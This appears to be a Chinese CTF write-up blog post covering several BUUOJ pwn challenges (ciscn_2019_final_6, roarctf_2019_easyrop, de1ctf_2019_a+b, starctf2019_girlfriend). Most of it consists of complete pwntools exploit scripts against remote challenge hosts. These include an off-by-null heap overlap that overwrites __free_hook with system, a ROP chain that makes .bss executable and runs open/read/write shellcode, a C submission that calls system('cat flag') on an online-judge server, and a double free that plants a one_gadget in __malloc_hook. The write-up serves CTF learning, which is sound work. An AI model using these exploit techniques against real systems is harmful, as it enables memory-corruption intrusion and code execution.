281 ciscn_2019_final_6
storage game里面有个输入函数
显然有个off by null。
exp
#coding:utf8
from pwn import*
r = remote('node4.buuoj.cn',26021)   # challenge instance; swap for process('./281') to debug locally
libc = ELF('./64/libc-2.27.so')      # libc bundled with the challenge; every libc.sym offset below belongs to this build
def resume():
    """Menu option 0: resume the current game; nothing else is sent."""
    menu_choice = '0'
    r.sendlineafter('>', menu_choice)
def new_game():
    """Menu option 1: start a new game with a fixed name and zero ops.

    Every allocation in the exploit goes through new_game() + store_game(),
    so the name and the ops count are deliberately constant.
    """
    dialogue = (
        ('>', '1'),
        ("what's your name?", 'aaaa'),
        ('input you ops count', '0'),
    )
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)
def load_game(index):
    """Menu option 2: load the record at `index`.

    The binary prints the loaded game's X/Y values, which the leak step
    below reads back with recvuntil('X:') / recvuntil('Y:').
    """
    r.sendlineafter('>', '2')
    r.sendlineafter('index?', '%d' % index)
def store_game(size = 0,comment = ''):
    """Menu option 3: store the current game, optionally with a comment.

    size == 0 answers 'N' to the comment prompt and returns. Otherwise 'Y',
    then `size`, then `comment` is written with sendafter (no newline is
    appended), which is why the short payloads at the end of the script
    carry their own '\\n'.
    """
    r.sendlineafter('>', '3')
    if not size:
        r.sendafter('any comment?', 'N')
        return
    r.sendafter('any comment?', 'Y')
    r.sendlineafter('comment size?', '%d' % size)
    r.sendafter('plz input comment', comment)
def delete_record(index):
    """Menu option 4: free the record stored at `index`."""
    dialogue = (('>', '4'), ('index?', str(index)))
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)
def show_record():
    """Menu option 5: list the stored records (defined but never called below)."""
    menu_choice = '5'
    r.sendlineafter('>', menu_choice)
# ---- heap grooming for the leak (glibc 2.27, tcache) -------------------------
# Record numbers in the comments assume the binary hands out indices in
# allocation order; that is consistent with the delete/load indices used here
# but should be verified against the binary.
new_game()
store_game(0xF0,'a'*0xF0)        # record 0: 0xF0-byte comment (0x100 chunk)
new_game()
store_game()                     # record 1: no comment; this is the record leaked later via load_game(1)
new_game()
store_game(0xF0,'a'*0xF0)        # record 2
for i in range(7):               # records 3..9: seven more 0x100 chunks
    new_game()
    store_game(0xF0,'a'*0xF0)
new_game()
store_game()                     # record 10
new_game()
store_game()                     # record 11
new_game()
store_game()                     # record 12
for i in range(3,10):            # seven frees of the same size: presumably fills that tcache bin (7 entries)
    delete_record(i)
delete_record(0)                 # with the bin full these should land in the unsorted bin (presumed)
delete_record(2)
for i in range(7):               # take the seven tcache chunks back out
    new_game()
    store_game(0xF0,'a'*0xF0)
delete_record(10)
new_game()
store_game(0xF0,'a'*0xF0)
delete_record(11)
new_game()
store_game(0xF0,'a'*0xF0)
delete_record(12)
new_game()
# 0x18-byte comment: 0x10 bytes of filler, then prev_size = 0x1a0 for the chunk
# that follows. The off-by-null noted in the prose then zeroes the low byte of
# that next chunk's size (clearing PREV_INUSE), so a later free() of it
# consolidates backwards over 0x1a0 bytes; the sum presumably spells out the
# sizes of the chunks in that range (verify in gdb).
store_game(0x18,'a'*0x10 + p64(0x100 + 0x20 + 0x30 + 0x20 + 0x30))
delete_record(0)
for i in range(2,8):
    delete_record(i)
delete_record(9)
delete_record(8)                 # presumably the free that triggers the backward consolidation
for i in range(7):
    new_game()
    store_game(0xF0,'a'*0xF0)
new_game()
store_game(0xF0,'a'*0xF0)        # carve from the consolidated region so record 1's data now overlaps freed memory (presumed)
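# ---- leak -------------------------------------------------------------------
# Record 1 overlaps freed unsorted-bin memory after the grooming above, so
# loading it prints libc pointers as the game's X/Y coordinates (presumed).
load_game(1)
r.recvuntil('X:')
main_arena_xx = int(r.recvuntil(',', drop=True))
r.recvuntil('Y:')
main_arena_xx += int(r.recvuntil(';', drop=True)) << 32
# BUG FIX: the original called sh.sendlineafter(), but `sh` is never defined in
# this script (the connection object is `r`), so it raised NameError here.
r.sendlineafter('input you ops count', '0')
# Page-align the leaked pointer and add __malloc_hook's in-page offset. This
# only works if the leaked address and __malloc_hook lie in the same 4 KiB
# page (true for main_arena in this libc build, as the writeup relies on —
# recompute from the real symbol if the libc changes).
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook_addr - libc.sym['__malloc_hook']
free_hook_addr = libc_base + libc.sym['__free_hook']
system_addr = libc_base + libc.sym['system']
print('libc_base= ' + hex(libc_base))   # same output as before, but valid under Python 2 and 3

# ---- __free_hook -> system ----------------------------------------------------
new_game()
# 0x60-byte comment: '/bin/sh' padded to 0x40, then a fake chunk header
# (size 0x31) whose first qword is __free_hook. Presumably this is written
# through the overlap into a freed 0x30 tcache chunk, so the next 0x20
# allocation is served from __free_hook (tcache next-pointer poisoning).
store_game(0x60, '/bin/sh'.ljust(0x40, '\x00') + p64(0) + p64(0x31) + p64(free_hook_addr) + '\n')
new_game()
store_game(0x20, p64(system_addr) + '\n')   # lands on __free_hook; write system()
# Freeing the record whose comment starts with "/bin/sh" calls
# __free_hook("/bin/sh") == system("/bin/sh"). Index 9 is assumed to be that
# record (slot reuse after the deletes above) — verify if the chain breaks.
delete_record(9)
r.interactive()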
282 [OGeek2019]hub
只有nc,连文件都没有。
搜了搜，之前是有文件的，现在题目不给，那就拉倒（跳过）。
283 roarctf_2019_easyrop
首先是刚开始有个输入,感觉这里似乎有个溢出。
然后进入一个if else
先分析401678这个函数。
我们的输入应该是个文件名
进来之后首先是个__xstat函数。
这个函数能获取文件的各种属性,所以外面我们会看到stat_buf.xxxxx。那个就是文件的各种属性。
__xstat返回的其实是文件的stat结构体,里面会记录文件的类型和权限。
会用结构体里面的mode出来进行判断
stat结构体的mode
大佬博客
主要是判断 st_mode 的高四位（文件类型位）是不是 1000，是不是 0100：1000 对应 S_IFREG（普通文件），0100 对应 S_IFDIR（目录）。
（原文认为不可能是 1000、文件类型只有三种，这点并不准确：1000 就是普通文件。）不过这个判断其实并不重要，因为如果我们输入的文件路径有问题，__xstat 就会失败、函数返回 0，程序直接跑到下面的沙箱部分。所以我们随便输入让它出错返回 0，接下来就是一个带沙箱的 ROP。
我们先泄露地址,然后通过mprotect改了权限然后orw就可以了。
exp
# -*- coding:utf-8 -*-
from pwn import *
context.log_level = 'debug'        # dump every send/recv; useful while debugging the leak, noisy otherwise
context.arch = "amd64"             # asm() below must target x86-64
context.os = "linux"
r = remote('node4.buuoj.cn', 26263)
#r = process("./283")              # local run
elf = ELF('./283')
libc = ELF("./64/libc-2.27.so")    # libc bundled with the challenge; the raw libc gadget offsets below belong to this build
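# ---- stage 1: leak libc through puts(puts@got) --------------------------------
# The 0x418 filler plus the single 0x28 byte match this binary's stack frame
# (found by the author; re-derive with cyclic() for another build). 0x401b93
# is used as a pop rdi ; ret gadget and 0x4019f3 returns into the binary so
# the overflow can be hit a second time (addresses from the binary, not
# verifiable here).
payload = 'a' * 0x418 + p8(0x28)
payload += p64(0x401b93) + p64(elf.got['puts']) + p64(elf.plt['puts'])
payload += p64(0x4019f3)
r.sendlineafter('>> ', payload)
# puts() prints the 6 significant bytes of the address; userland x86-64
# addresses end in 0x7f, so recvuntil('\x7f') grabs exactly that.
libc_base = u64(r.recvuntil('\x7f')[-6:] + '\x00\x00') - libc.symbols['puts']
# Sanity check: a libc base is page aligned; anything else means the leak was
# parsed from the wrong bytes (fail fast instead of sending a bogus chain).
if libc_base & 0xfff:
    raise ValueError('leak parse failed, libc_base not page aligned: ' + hex(libc_base))
print(hex(libc_base))   # same output as before, valid under Python 2 and 3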
# ---- stage 2: gets() shellcode into .bss, mprotect() it RWX, jump to it -------
# Gadget roles are inferred from the argument order below: 0x401b93 = pop rdi ;
# ret (binary), libc+0x23e6a = pop rsi ; ret, libc+0x1b96 = pop rdx ; ret (this
# libc-2.27 build). Re-verify with ROPgadget if either file changes.
payload = 'a' * 0x418 + p8(0x28)
payload += p64(0x401b93) + p64(elf.bss())                          # rdi = .bss
payload += p64(libc_base + libc.sym['gets'])                       # gets(.bss): reads the shellcode sent next
payload += p64(0x401b93) + p64(elf.bss() & 0xfffffffffffff000)     # rdi = page containing .bss
payload += p64(libc_base + 0x23e6a) + p64(0x1000)                  # rsi = 0x1000 (one page)
payload += p64(libc_base + 0x1b96)
payload += p64(7) + p64(libc_base + libc.sym['mprotect']) + p64(elf.bss())   # rdx = 7 (RWX); mprotect(); then ret into .bss
r.sendlineafter('>> ', payload)
# Open/read/write shellcode, delivered as the gets() input of the chain above.
# Constraints: it passes through gets(), so it must contain no 0x0a byte; it
# runs inside the binary's sandbox (per the prose), hence raw syscalls only:
# open(2), read(0), write(1), exit_group(231).
# 0x67616c662f2e is "./flag" little-endian; the two zero high bytes of rax
# terminate the string once pushed. On open() failure the code writes 4 bytes
# of the pushed 1 to stdout as a marker and exits — note `jg` treats fd 0 as
# failure too, which is harmless here as fd 0 is already stdin.
shellcode = asm('''
mov rax, 0x67616c662f2e
push rax
mov rdi, rsp
xor esi, esi
mov eax, 2
syscall
cmp eax, 0
jg next
push 1
mov edi, 1
mov rsi, rsp
mov edx, 4
mov eax, edi
syscall
jmp exit
next:
mov edi, eax
mov rsi, rsp
mov edx, 0x100
xor eax, eax
syscall
mov edx, eax
mov edi, 1
mov rsi, rsp
mov eax, edi
syscall
exit:
xor edi, edi
mov eax, 231
syscall
''')
r.sendline(shellcode)   # consumed by gets(.bss); the chain then mprotect()s that page and jumps to it
r.interactive()
284 de1ctf_2019_a+b
给的是一个dockerfile。
Dockerfile 应该是那个网站的，我们可以直接登上那个网站看看。
可以提交点啥。
得打开server.py审计一下。
#! /bin/python
from flask import Flask,render_template,request
import uuid
import os
import lorun
import multiprocessing
app = Flask(__name__)
# Verdict strings indexed by the integer that lorun.run()['result'] and
# lorun.check() return (0 = Accepted ... 8 = System Error); judge() indexes
# this list directly with those values.
RESULT_STR = [
    'Accepted',
    'Presentation Error',
    'Time Limit Exceeded',
    'Memory Limit Exceeded',
    'Wrong Answer',
    'Runtime Error',
    'Output Limit Exceeded',
    'Compile Error',
    'System Error'
]
def compile_binary(random_prefix):
    """Compile <random_prefix>.c into <random_prefix>_prog with gcc.

    random_prefix is a uuid hex string chosen by judge(), so the shell
    command it is interpolated into is not attacker-shaped. NOTE(review): the
    compile itself is not confined by lorun — gcc runs with the web server's
    privileges, bounded only by judge()'s 1-second join, and because the
    caller terminates the multiprocessing child rather than this shell's gcc
    grandchild, a slow compile keeps running after the 'compile error!' reply.
    """
    src = '%s.c' % random_prefix
    prog = '%s_prog' % random_prefix
    os.system('gcc %s -o %s' % (src, prog))
@app.route("/judge",methods=['POST'])
def judge():
    """Compile the POSTed C source, run it under lorun on a+b.in and compare
    the output with a+b.out; returns a verdict string (rendered as HTML).

    Security notes (review):
    - The submitted source is fully attacker-controlled; gcc runs outside the
      lorun sandbox (only the resulting program is confined) with the server's
      privileges.
    - The 'Wrong Answer' branch echoes the program's stdout into the response
      unescaped, and the except branch returns str(e): both reflect untrusted
      text into HTML.
    - Temp-file cleanup is incomplete on the error paths (see inline notes).
    """
    try:
        # Per-request file names. uuid1 is time/MAC based: unique, not secret.
        random_prefix = uuid.uuid1().hex
        random_src = random_prefix + '.c'
        random_prog = random_prefix + '_prog'
        random_output = random_prefix + '.out'
        if 'code' not in request.form:
            return 'code not exists!'
        # Write the user's source to disk exactly as submitted.
        with open(random_src,'w') as f:
            f.write(request.form['code'])
        # Compile in a child process so the 1s join bounds wall time.
        # NOTE(review): terminate() only kills the Python child, not the gcc
        # it spawned via os.system(); and on this timeout path random_src is
        # never removed.
        process = multiprocessing.Process(target=compile_binary,args=(random_prefix,))
        process.start()
        process.join(1)
        if process.is_alive():
            process.terminate()
            return 'compile error!'
        if not os.path.exists(random_prefix+'_prog'):
            os.remove(random_src)
            return 'compile error!'
        fin = open('a+b.in','r')
        ftemp = open(random_output, 'w')
        runcfg = {
            'args':['./'+random_prog],
            'fd_in':fin.fileno(),
            'fd_out':ftemp.fileno(),
            'timelimit':1000,        # units not visible here; presumably ms
            'memorylimit':200000,    # units not visible here; presumably KiB
            'trace':True,            # presumably ptrace-based syscall filtering against 'calls'
            # Syscall whitelist handed to lorun. 59 is not in it; whether lorun
            # reads these as x86-64 numbers (where 59 = execve) is not visible
            # from this file — the writeup's system("cat flag") payload suggests
            # the filter does not block process creation in practice.
            'calls':[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 16, 21, 25, 56, 63, 78, 79, 87, 89, 97, 102, 158, 186, 202, 218, 219, 231, 234, 273],
            # Paths the sandboxed program may open; the per-path value is
            # presumably an open-flags mask enforced by lorun (not documented here).
            'files':{
                "/etc/ld.so.cache":524288,
                "/lib/x86_64-linux-gnu/libc.so.6":524288,
                "/lib/x86_64-linux-gnu/libm.so.6":524288,
                "/usr/lib/x86_64-linux-gnu/libstdc++.so.6":524288,
                "/lib/x86_64-linux-gnu/libgcc_s.so.1":524288,
                "/lib/x86_64-linux-gnu/libpthread.so.0":524288,
                "/etc/localtime":524288
            }
        }
        rst = lorun.run(runcfg)
        # NOTE(review): if lorun.run raises, fin/ftemp are never closed and the
        # except branch below removes the .c/_prog files but never the .out file.
        fin.close()
        ftemp.close()
        os.remove(random_prog)
        os.remove(random_src)
        if rst['result'] == 0:
            # Program ran to completion: compare its output with the reference.
            ftemp = open(random_output,'r')
            fout = open('a+b.out','r')
            crst = lorun.check(fout.fileno() , ftemp.fileno())
            fout.seek(0)
            ftemp.seek(0)
            standard_output = fout.read()
            test_output = ftemp.read()
            fout.close()
            ftemp.close()
            if crst != 0:
                # crst indexes RESULT_STR (presumably 1 = PE, 4 = WA from lorun).
                msg = RESULT_STR[crst] +'<br/>'
                msg += 'standard output:<br/>'
                msg += standard_output +'<br/>'
                msg += 'your output:<br/>'
                msg += test_output   # raw program stdout, unescaped, into an HTML response (reflected XSS / data exfil channel)
                os.remove(random_output)
                return msg
        os.remove(random_output)
        return RESULT_STR[rst['result']]
    except Exception as e:
        if os.path.exists(random_prog):
            os.remove(random_prog)
        if os.path.exists(random_src):
            os.remove(random_src)
        return 'ERROR! '+str(e)   # exception text (paths, internals) is sent to the client
    return 'ERROR!'   # unreachable: both the try body and the except branch return
@app.route("/")
def hello():
    """Serve the submission form (index.html from Flask's default template folder)."""
    page = render_template('index.html')
    return page
if __name__ == '__main__':
    # Development server bound on every interface; debug mode is not enabled
    # here, so the Werkzeug debugger is not exposed.
    app.run(host='0.0.0.0',port=11111)
可以看到：我们先提交一段 C 代码，服务端会用 gcc 编译一下，然后在 lorun 沙箱里跑一下，输出和标准答案不一致时还会把程序的输出原样回显出来……
那直接system不就好了……
#include <stdlib.h>
#include <stdio.h>

/*
 * "Solution" submitted to the judge: it ignores a+b and just runs a shell
 * command. judge() in server.py compiles and executes whatever C source is
 * posted, and when the program's stdout differs from a+b.out the
 * 'Wrong Answer' branch echoes that stdout back in the response — that is
 * how the flag comes out. "flag" is assumed to sit in the judge's working
 * directory (not shown in the writeup).
 */
int main(void)
{
    /* stdout is what the judge reflects, so a plain cat is enough */
    system("cat flag");
    return 0;
}
285 starctf2019_girlfriend
双层结构。
show
没有edit
free
free 之后指针没有清空（delete 之后仍然可以 show），显然有 UAF。
exp
from pwn import *
context.log_level = "debug"        # dump every send/recv
p=remote('node4.buuoj.cn',28575)
#p = process("./285")              # local run
elf=ELF('./285')
#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")
libc = ELF("./64/libc-2.27.so")    # build specific: the one_gadget offset and the page trick below assume this exact libc
def add(size,call):
    """Menu option 1: create an entry.

    `size` answers the name-length prompt and `call` (despite its name) is
    sent as the *name*; the phone-number ('call:') prompt always gets "1111".
    The name buffer is the heap chunk every payload below is written through.
    """
    dialogue = [
        (':', '1'),
        ('name', str(size)),
        ('name:', call),
        ('call:', "1111"),
    ]
    for prompt, data in dialogue:
        p.sendlineafter(prompt, data)
def show(idx):
    """Menu option 2: print entry `idx`; after delete(idx) this reads freed memory (the UAF leak)."""
    dialogue = ((':', '2'), ('index:', str(idx)))
    for prompt, data in dialogue:
        p.sendlineafter(prompt, data)
def edit():
    """Menu option 3; the prose says the binary has no usable edit, and nothing below calls this."""
    menu_choice = '3'
    p.sendlineafter(':', menu_choice)
def delete(idx):
    """Menu option 4: free entry `idx` (the pointer is not cleared, hence the UAF/double free below)."""
    p.sendlineafter(':', '4')
    p.sendlineafter('index:', '%d' % idx)
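# ---- leak libc via the UAF -----------------------------------------------------
add(0x450, '0')   # index 0: presumably sized above the tcache limit so free() puts it in the unsorted bin
add(0x10, '1')    # index 1: small chunk between 0 and top so 0 is not merged into top (presumed)
delete(0)
show(0)           # UAF: the freed chunk's fd (a main_arena pointer) is printed as the name
# Page-align the leaked pointer and add __malloc_hook's in-page offset. This
# relies on the leaked main_arena address sharing a 4 KiB page with
# __malloc_hook, which holds for this libc-2.27 build; recompute from the
# symbol if the libc changes.
malloc_hook = (u64(p.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
realloc = libc_base + libc.sym['realloc']
system_addr = libc_base + libc.sym["system"]   # not used by the chain below
one_gadget = libc_base + 0x10a38c              # one_gadget offset for this exact libc; re-run one_gadget for another build
print("libc_base = " + hex(libc_base))   # same output as before, valid under Python 2 and 3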
# ---- tcache/fastbin double free -> __malloc_hook --------------------------------
for i in xrange(7 + 1 + 2):
    add(0x68, str(i))               # ten 0x70 chunks (presumably indices 2..11)
for i in xrange(7 + 1):
    delete(i + 1)                   # index 1 plus seven 0x70 chunks: fills the 0x70 tcache bin (7 entries)
delete(9)                           # bin full, so these go to the 0x70 fastbin
delete(10)
delete(9)                           # fastbin double free: glibc only checks the bin head (10), so 9 passes
for i in xrange(7):
    add(0x68, str(i))               # drain the tcache bin so the next request reaches the fastbin
# Serving the first fastbin request returns chunk 9 and writes our pointer
# into its fd / tcache-next field. glibc 2.27 also stashes the remaining
# fastbin chunks into tcache at this point, which is presumably why two more
# allocations are needed before the poisoned pointer comes back.
add(0x68, p64(malloc_hook - 0x13))
add(0x68, 'x')
add(0x68, 'x')
# This allocation lands at __malloc_hook - 0x13: 0xb bytes of padding put
# one_gadget into __realloc_hook (hook - 8) and realloc+6 into __malloc_hook.
# Entering realloc past its first pushes shifts rsp so the one_gadget's stack
# constraint holds (the usual realloc-hook trick; the +6 is build specific).
add(0x68, '\x00' * 0xb+p64(one_gadget)+p64(realloc+6))
p.sendlineafter("choice:", "1")     # the next malloc runs __malloc_hook -> realloc -> __realloc_hook -> one_gadget
p.sendline("cat flag")
p.interactive()
来源: https://blog.csdn.net/yongbaoii/article/details/119815098